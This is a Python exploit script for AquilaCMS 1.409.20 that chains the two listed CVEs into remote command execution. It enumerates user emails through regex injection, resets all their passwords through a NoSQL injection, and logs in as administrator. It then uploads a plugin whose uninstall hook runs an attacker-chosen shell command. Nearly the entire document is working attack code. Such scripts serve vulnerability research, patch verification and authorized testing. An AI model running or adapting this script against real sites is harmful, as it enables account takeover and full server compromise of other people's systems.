1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 |
# Exploit Title: AquilaCMS 1.409.20 - Remote Command Execution (RCE) # Date: 2024-10-25 # Exploit Author: Eui Chul Chung # Vendor Homepage: https://www.aquila-cms.com/ # Software Link: https://github.com/AquilaCMS/AquilaCMS # Version: v1.409.20 # CVE: CVE-2024-48572, CVE-2024-48573 import io import json import uuid import string import zipfile import argparse import requests import textwrap def unescape_special_characters(email): return ( email.replace("[$]", "$") .replace("[*]", "*") .replace("[+]", "+") .replace("[-]", "-") .replace("[.]", ".") .replace("[?]", "?") .replace(r"[\^]", "^") .replace("[|]", "|") ) def get_user_emails(): valid_characters = list( string.ascii_lowercase + string.digits + "!#%&'/=@_`{}~" ) + ["[$]", "[*]", "[+]", "[-]", "[.]", "[?]", r"[\^]", "[|]"] emails_found = [] next_emails = ["^"] while next_emails: prev_emails = next_emails next_emails = [] for email in prev_emails: found = False for ch in valid_characters: data = {"email": f"{email + ch}.*"} res = requests.put(f"{args.url}/api/v2/user", json=data) if json.loads(res.text)["code"] == "UserAlreadyExist": next_emails.append(email + ch) found = True if not found: emails_found.append(email[1:]) print(f"[+] {unescape_special_characters(email[1:])}") return emails_found def reset_password(email): data = {"email": email} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) data = {"token": {"$ne": None}, "password": args.password} requests.post(f"{args.url}/api/v2/user/resetpassword", json=data) print(f"[+] {unescape_special_characters(email)} : {args.password}") def get_admin_auth_token(emails): for email in emails: data = {"username": email, "password": args.password} res = requests.post(f"{args.url}/api/v2/auth/login/admin", json=data) if res.status_code == 200: print(f"[+] Administrator account : {unescape_special_characters(email)}") return json.loads(res.text)["data"] return None def create_plugin(plugin_name): payload = textwrap.dedent( f""" const {{ exec }} = require("child_process"); /** * This function is called when the plugin is desactivated or when we delete it */ module.exports = async function (resolve, reject) {{ try {{ exec("{args.command}"); return resolve(); }} catch (error) {{}} }}; """ ).strip() plugin = io.BytesIO() with zipfile.ZipFile(plugin, "a", zipfile.ZIP_DEFLATED, False) as zip_file: zip_file.writestr( f"{plugin_name}/package.json", io.BytesIO(f'{{ "name": "{plugin_name}" }}'.encode()).getvalue(), ) zip_file.writestr( f"{plugin_name}/info.json", io.BytesIO(b'{ "info": {} }').getvalue() ) zip_file.writestr( f"{plugin_name}/uninit.js", io.BytesIO(payload.encode()).getvalue() ) plugin.seek(0) return plugin def rce(emails): auth_token = get_admin_auth_token(emails) if auth_token is None: print("[-] Administrator account not found") return print("[+] Create malicious plugin") plugin_name = uuid.uuid4().hex plugin = create_plugin(plugin_name) print("[+] Upload plugin") headers = {"Authorization": auth_token} files = {"file": (f"{plugin_name}.zip", plugin, "application/zip")} requests.post(f"{args.url}/api/v2/modules/upload", headers=headers, files=files) print("[+] Find uploaded plugin") headers = {"Authorization": auth_token} data = {"PostBody": {"limit": 0}} res = requests.post(f"{args.url}/api/v2/modules", headers=headers, json=data) plugin_id = None for data in json.loads(res.text)["datas"]: if data["name"] == plugin_name: plugin_id = data["_id"] print(f"[+] Plugin ID : {plugin_id}") break if plugin_id is None: print("[-] Plugin not found") return print("[+] Deactivate plugin") headers = {"Authorization": auth_token} data = {"idModule": plugin_id, "active": False} res = requests.post(f"{args.url}/api/v2/modules/toggle", headers=headers, json=data) if res.status_code == 200: print("[+] Command execution succeeded") else: print("[-] Command execution failed") def main(): print("[*] Retrieve email addresses") emails = get_user_emails() print("\n[*] Reset password") for email in emails: reset_password(email) print("\n[*] Perform remote code execution") rce(emails) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument( "-u", dest="url", help="Site URL (e.g. www.aquila-cms.com)", type=str, required=True, ) parser.add_argument( "-p", dest="password", help="Password to use for password reset (e.g. HaXX0r3d!)", type=str, default="HaXX0r3d!", ) parser.add_argument( "-c", dest="command", help="Command to execute (e.g. touch /tmp/pwned)", type=str, default="touch /tmp/pwned", ) args = parser.parse_args() main() |